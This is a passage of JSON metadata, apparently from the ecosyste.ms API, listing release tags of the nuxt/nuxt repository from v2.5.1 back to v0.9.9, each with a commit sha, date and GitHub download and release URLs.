/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2F